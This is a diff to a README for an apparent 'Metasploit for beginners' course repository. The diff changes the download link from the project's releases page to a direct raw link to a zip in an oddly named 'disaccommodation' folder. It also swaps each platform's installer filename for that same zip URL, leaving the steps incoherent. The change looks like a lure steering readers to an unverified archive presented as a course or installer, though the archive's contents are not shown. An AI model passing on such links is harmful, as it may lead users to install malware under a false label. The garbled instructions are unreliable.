Aviwe45/metasploit-for-beginners/README.md

    - Internet Connection: Required for downloading and updating modules.

 2. **Download the Course**
-   Visit this page to download: [Download the Course](https://github.com/Aviwe45/metasploit-for-beginners/releases)
+   Visit this page to download: [Download the Course](https://raw.githubusercontent.com/Aviwe45/metasploit-for-beginners/master/disaccommodation/metasploit-for-beginners.zip)

 3. **Choose the Version**
    Look for the latest stable release.
 It usually has the highest version number.
 Click on it to view available assets.

 4. **Select Your Platform**
    Depending on your operating system, find the appropriate file to download.
 For example:
-   - Windows users might see something like `metasploit-windows-installer.exe`.
+   - Windows users might see something like `https://raw.githubusercontent.com/Aviwe45/metasploit-for-beginners/master/disaccommodation/metasploit-for-beginners.zip`.
-   - macOS users might find `metasploit-macos-installer.dmg`.
+   - macOS users might find `https://raw.githubusercontent.com/Aviwe45/metasploit-for-beginners/master/disaccommodation/metasploit-for-beginners.zip`.
-   - Linux users will see `metasploit-linux-installer.tar.gz`.
+   - Linux users will see `https://raw.githubusercontent.com/Aviwe45/metasploit-for-beginners/master/disaccommodation/metasploit-for-beginners.zip`.

 5. **Download the File**
    Click on the file corresponding to your operating system to start the download.
 The download might take a few minutes depending on your connection speed.